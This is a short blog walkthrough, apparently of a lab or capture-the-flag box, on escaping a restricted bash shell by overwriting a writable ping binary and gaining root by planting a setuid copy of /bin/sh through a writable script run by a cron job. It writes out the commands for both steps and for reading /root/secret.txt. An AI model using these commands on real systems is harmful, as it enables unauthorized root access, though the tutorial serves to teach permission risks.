News Ticker

How to escape root privilege in linux and root

By Unknown - Saturday, 6 August 2016 No Comments
I SSH the system with restricted1, after login i found I was in a restricted bash shell (rbash).
I found that several commands were not allowed, and / character was allowed in arguments but not in the command name.
So I can’t call any commands by path.
so i have used below command to check files, and their permission.
ls -la ./bin

I found that i have write permission to ping file.
and why there is tee command ? (its a hint)
so i have used tee command to write bash into ping using below command.
echo '#!' | tee ./bin/ping
echo '/bin/bash' | tee -a ./bin/ping


Then I run the ping command and i escaped from restricted shell.
I am no longer in a restricted of shell.
I set my ENV path so I don’t have to specify full paths to programs:
export PATH=$PATH:/bin
export PATH=$PATH:/usr/bin


After performing lots of vulnerability test i found that there was a cron job running, so i have switch to
cd /etc/cron.minutely/mtr

but the file had no write permission, but after checking the file using
cat /etc/cron.minutely/mtr

that file was including another file from,
/usr/bin/mtr-check

and had write permission permission to check run,
ls -la /usr/bin/mtr-check

so i had alter the content from below code, using nano editor.
cp /bin/sh /home/restricted1/ud64 && chmod 4755 /home/restricted1/ud64

cron will copy /bin/sh to my directory (restricted1) and setting the s flag using chmod 4755 (so i had setuid upon execution).
when i switch to /home/restricted1, i found ud64, after performing
./ud64

i got root. to check performed
whoami

and finally to read content used below line,
cat /root/secret.txt

hope this tutorial will help you to understand the security risk associated with vulnerability of improper file permission.
Thanks.. :) ./unknowndevice64

No Comment to " How to escape root privilege in linux and root "